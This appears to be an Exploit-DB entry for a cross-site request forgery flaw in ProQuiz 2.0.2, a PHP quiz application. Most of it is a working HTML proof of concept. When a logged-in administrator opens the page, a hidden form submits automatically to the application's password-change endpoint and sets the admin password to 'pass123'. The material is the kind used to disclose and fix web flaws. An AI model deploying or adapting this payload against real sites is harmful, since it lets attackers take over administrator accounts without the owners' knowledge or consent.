ProQuiz 2.0.2 - CSRF Vulnerability

2012-08-16T00:00:00
ID EDB-ID:20550
Type exploitdb
Reporter DaOne
Modified 2012-08-16T00:00:00

Description

ProQuiz 2.0.2 - CSRF Vulnerability. Webapps exploit for php platform

                                        
                                            ##########################################

[~] Exploit Title: ProQuiz v2.0.2 CSRF Vulnerability

[~] Author: DaOne

[~] Date: 19/8/2012

[~] Software Link: http://code.google.com/p/proquiz/downloads/list

##########################################



[#] [ CSRF Change Admin Password ]



</form>

<html>

<body onload="document.form0.submit();">

<form method="POST" name="form0" action="http://[target]/functions.php?action=edit_profile&type=password">

<input type="hidden" name="password" value="pass123"/>

<input type="hidden" name="cpassword" value="pass123"/>

</form>

</body>

</html>



##########################################